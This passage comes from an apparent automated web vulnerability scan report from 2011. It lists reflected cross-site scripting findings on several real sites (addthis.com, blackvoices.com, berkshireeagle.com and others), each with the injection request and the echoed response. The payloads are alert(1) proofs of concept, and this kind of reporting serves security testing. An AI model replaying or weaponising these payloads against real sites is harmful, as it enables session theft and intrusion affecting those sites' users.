Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=a1eyxe45csoeo145imhg5vfy; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=a1eyxe45csoeo145imhg5vfy; path=/; HttpOnly
Set-Cookie: spvdr=vd=59ea87f5-6021-4c78-b7d1-1f922fc6dbd0&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:34 GMT; path=/
Set-Cookie: itr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:25:33 GMT
Connection: close
Content-Length: 19276
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="tr-TR" lang="tr-TR" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815996&ud=0&pe=/homepage.aspx&he=tr.imlive.com&ul=/?2afd4'-alert(1)-'3181e4bce5=1&qs=2afd4'-alert(1)-'3181e4bce5=1&qs=2afd4'-alert(1)-'3181e4bce5=1&iy=dallas&id=44&iu=1&vd=59ea87f5-6021-4c78-b7d1-1f922fc6dbd0';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEv
...[SNIP]...

4.759. http://tr.imlive.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tr.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4282"><script>alert(1)</script>18266d653ee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?d4282"><script>alert(1)</script>18266d653ee=1 HTTP/1.1
Host: tr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=5vcekb45xpt03o55sfewid55; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=5vcekb45xpt03o55sfewid55; path=/; HttpOnly
Set-Cookie: spvdr=vd=73be72ba-f032-4534-9729-f91765d9dbef&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:33 GMT; path=/
Set-Cookie: itr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:25:32 GMT
Connection: close
Content-Length: 19702
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="tr-TR" lang="tr-TR" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||d4282"><script>alert(1)</script>18266d653ee~1');return false;">
...[SNIP]...

4.760. http://voken.eyereturn.com/ [233369&click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://voken.eyereturn.com
Path:   /

Issue detail

The value of the 233369&click request parameter is copied into the HTML document as plain text between tags. The payload c98d3<script>alert(1)</script>b11dcabd3ff was submitted in the 233369&click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /?233369&click=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000943794/cstr=758797=_4d43560a,8830366303,766159^943794^1183^0,1_/xsxdata=$xsxdata/bnum=758797/optn=64?trg=c98d3<script>alert(1)</script>b11dcabd3ff&params=8830366303 HTTP/1.1
Host: voken.eyereturn.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP NID PSAo PSDa OUR STP IND UNI COM NAV"
Set-Cookie: cmggl=1; Domain=.eyereturn.com; Expires=Mon, 28-Feb-2011 01:39:39 GMT; Path=/
Set-Cookie: er_guid=0253E4A4-2BB0-7708-5C00-B99AAC47FE39; Domain=.eyereturn.com; Expires=Mon, 28-Jan-2013 01:39:39 GMT; Path=/
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Sat, 29 Jan 2011 01:39:39 GMT
Connection: close
Server: eyeReturn Ad Serveri 6
Content-Length: 14948

//<!CDATA[// Copyright eyeReturn Marketing Inc., 2011, All Rights Reserved //
er_CID='7054';er_SegID='233370';er_imgSrc='http://resources.eyereturn.com/7054/007054_polite_300x250_f_30_v1.swf';er_toke
...[SNIP]...
3';er_wsID='1172';er_RedirURL='http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000943794/cstr=758797=_4d43560a,8830366303,766159^943794^1183^0,1_/xsxdata=$xsxdata/bnum=758797/optn=64?trg=c98d3<script>alert(1)</script>b11dcabd3ffhttp://ampyra.com/landing/infokit?&utm_campaign=FY10&utm_medium=banner&utm_source=aol&utm_content=ADCOM_MSS_B_DOCKIK_300x250_F';er_clickURL='http://r1-ads.ace.advertising.com/click/site=0000766159/mnum
...[SNIP]...

4.761. http://voken.eyereturn.com/pb/get [233369&click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://voken.eyereturn.com
Path:   /pb/get

Issue detail

The value of the 233369&click request parameter is copied into the HTML document as plain text between tags. The payload 9f1ff<script>alert(1)</script>6eb75e1cdc4 was submitted in the 233369&click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pb/get?233369&click=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000943794/cstr=758797=_4d43560a,8830366303,766159^943794^1183^0,1_/xsxdata=$xsxdata/bnum=758797/optn=64?trg=9f1ff<script>alert(1)</script>6eb75e1cdc4&params=8830366303 HTTP/1.1
Host: voken.eyereturn.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmggl=1; er_guid=AB15549D-BD77-4F41-E5E1-E44D3AF016E4

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP NID PSAo PSDa OUR STP IND UNI COM NAV"
Set-Cookie: erTok="AwAAAADLogMAA7ggAAEAAByjAwADuCAAAQAA"; Domain=.eyereturn.com; Expires=Mon, 28-Jan-2013 01:39:47 GMT; Path=/
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Sat, 29 Jan 2011 01:39:47 GMT
Connection: close
Server: eyeReturn Ad Serveri 6
Content-Length: 14839

//<!CDATA[// Copyright eyeReturn Marketing Inc., 2011, All Rights Reserved //
er_CID='7054';er_SegID='233370';er_imgSrc='http://resources.eyereturn.com/7054/007054_polite_300x250_f_30_v1.swf';er_toke
...[SNIP]...
4';er_wsID='1172';er_RedirURL='http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000943794/cstr=758797=_4d43560a,8830366303,766159^943794^1183^0,1_/xsxdata=$xsxdata/bnum=758797/optn=64?trg=9f1ff<script>alert(1)</script>6eb75e1cdc4http://ampyra.com/landing/infokit?&utm_campaign=FY10&utm_medium=banner&utm_source=aol&utm_content=ADCOM_MSS_B_BBQIK_300x250_F';er_clickURL='http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=
...[SNIP]...

4.762. http://widgets.mobilelocalnews.com/ [uid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.mobilelocalnews.com
Path:   /

Issue detail

The value of the uid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95d17"><script>alert(1)</script>6e51300229e was submitted in the uid parameter. This input was echoed as 95d17\"><script>alert(1)</script>6e51300229e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?uid=42b39fdb198522d2bfc6b1f64cd9836595d17"><script>alert(1)</script>6e51300229e HTTP/1.1
Host: widgets.mobilelocalnews.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/srvc=home&position=4
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:39:50 GMT
Server: Apache
Content-Type: text/html
Content-Length: 8345


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title> M
...[SNIP]...
<input type="hidden" id="userid" name="userid" value="42b39fdb198522d2bfc6b1f64cd9836595d17\"><script>alert(1)</script>6e51300229e">
...[SNIP]...

4.763. http://www.addthis.com/bookmark.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload df18b<script>alert(1)</script>803ab7018bd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bookmark.phpdf18b<script>alert(1)</script>803ab7018bd HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sat, 29 Jan 2011 02:03:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=uqvune1puuutljd0ma17l7lng6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1473
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>bookmark.phpdf18b<script>alert(1)</script>803ab7018bd</strong>
...[SNIP]...

4.764. http://www.addthis.com/bookmark.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 63e5f"-alert(1)-"65114331d2d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bookmark.php63e5f"-alert(1)-"65114331d2d HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sat, 29 Jan 2011 02:03:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=1ndjvr1kahoqlol8igujp0dtv0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1447
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/bookmark.php63e5f"-alert(1)-"65114331d2d";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination');
}
if (window._gat) {
var gaPageTracker = _gat._get
...[SNIP]...

4.765. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f922a"-alert(1)-"ab5ad896ba9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bookmark.php/f922a"-alert(1)-"ab5ad896ba9 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:03:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 92654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...
<script type="text/javascript">
var u = "/bookmark.php/f922a"-alert(1)-"ab5ad896ba9";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination');
}
if (window._gat) {
var gaPageTracker = _gat._get
...[SNIP]...

4.766. http://www.addthis.com/bookmark.php [v parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of the v request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5b14"style%3d"x%3aexpression(alert(1))"5b81dfd1d34 was submitted in the v parameter. This input was echoed as c5b14"style="x:expression(alert(1))"5b81dfd1d34 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /bookmark.php?v=20c5b14"style%3d"x%3aexpression(alert(1))"5b81dfd1d34 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:03:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 92671

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...
<input type="hidden" id="source" name="source" value="bkm-20c5b14"style="x:expression(alert(1))"5b81dfd1d34" />
...[SNIP]...

4.767. http://www.berkshireeagle.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.berkshireeagle.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0ba9"><script>alert(1)</script>7e6d2fe4b4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?f0ba9"><script>alert(1)</script>7e6d2fe4b4=1 HTTP/1.1
Host: www.berkshireeagle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Vary: Accept-encoding
Expires: Sat, 29 Jan 2011 02:03:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 02:03:27 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=N2FW0OYZDCKHMCUUCAWCFEY; path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 106563

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Home'><meta name="keywords" content="Berkshire Eagle headlines"/><title>Home - Berkshire Ea
...[SNIP]...
<form action="http://www.berkshireeagle.com/index.html?f0ba9"><script>alert(1)</script>7e6d2fe4b4=1&_DARGS=/portlet/polls/html/display_poll.jsp" name="polls_17227619_1296266606898" method="post">
...[SNIP]...

4.768. http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blackvoices.com
Path:   /$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fca6f"-alert(1)-"c91e5761538 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /$|http:fca6f"-alert(1)-"c91e5761538/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video HTTP/1.1
Host: www.blackvoices.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
set-cookie: dcisid=2393099708.1261781325.2487813376; path=/
X-RSP: 1
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Fri, 28 Jan 2011 15:06:01 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
Content-Length: 31117
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- START PAGE: acp-ld03 -->
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<!--
s_265.mmxgo=true;
s_265.pageName="Page Not Found";
s_265.channel="us.bv";
s_265.trackExternalLinks="true";
s_265.prop1="$|http:fca6f"-alert(1)-"c91e5761538";
s_265.pfxID="bkv";
s_265.disablepihost=false;
s_265.prop12="http://www.blackvoices.com/$|http:fca6f\"-alert(1)-\"c91e5761538/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertain
...[SNIP]...

4.769. http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blackvoices.com
Path:   /$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 989c3</script><script>alert(1)</script>1b58c94f716 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /$|http:/latino.aol.com989c3</script><script>alert(1)</script>1b58c94f716/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video HTTP/1.1
Host: www.blackvoices.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
set-cookie: dcisid=3240312844.2536784205.3019310080; path=/
X-RSP: 1
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Fri, 28 Jan 2011 15:06:03 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
Content-Length: 31107
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- START PAGE: acp-lm03 -->
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
Not Found";
s_265.channel="us.bv";
s_265.trackExternalLinks="true";
s_265.prop1="$|http:";
s_265.pfxID="bkv";
s_265.disablepihost=false;
s_265.prop12="http://www.blackvoices.com/$|http:/latino.aol.com989c3</script><script>alert(1)</script>1b58c94f716/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video";
s_265.linkInternal
...[SNIP]...

4.770. http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blackvoices.com
Path:   /$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 85a57</script><script>alert(1)</script>5ec905f2ca9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /$|http:/latino.aol.com/$|.ivillage.com.*85a57</script><script>alert(1)</script>5ec905f2ca9/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video HTTP/1.1
Host: www.blackvoices.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
set-cookie: dcisid=3244900364.2587377997.113116416; path=/
X-RSP: 1
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Fri, 28 Jan 2011 15:06:04 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
Content-Length: 31109
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- START PAGE: acp-lm30 -->
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
.channel="us.bv";
s_265.trackExternalLinks="true";
s_265.prop1="$|http:";
s_265.pfxID="bkv";
s_265.disablepihost=false;
s_265.prop12="http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*85a57</script><script>alert(1)</script>5ec905f2ca9/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video";
s_265.linkInternalFilters="javascrip
...[SNIP]...

4.771. http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blackvoices.com
Path:   /$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 585c5</script><script>alert(1)</script>6640b326e5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com585c5</script><script>alert(1)</script>6640b326e5/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video HTTP/1.1
Host: www.blackvoices.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
set-cookie: dcisid=2334772668.4164436301.809108992; path=/
X-RSP: 1
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Fri, 28 Jan 2011 15:06:05 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
Content-Length: 31108
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- START PAGE: acp-ld29 -->
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
_265.trackExternalLinks="true";
s_265.prop1="$|http:";
s_265.pfxID="bkv";
s_265.disablepihost=false;
s_265.prop12="http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com585c5</script><script>alert(1)</script>6640b326e5/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video";
s_265.linkInternalFilters="javascript:,aol.com,blackvoi
...[SNIP]...

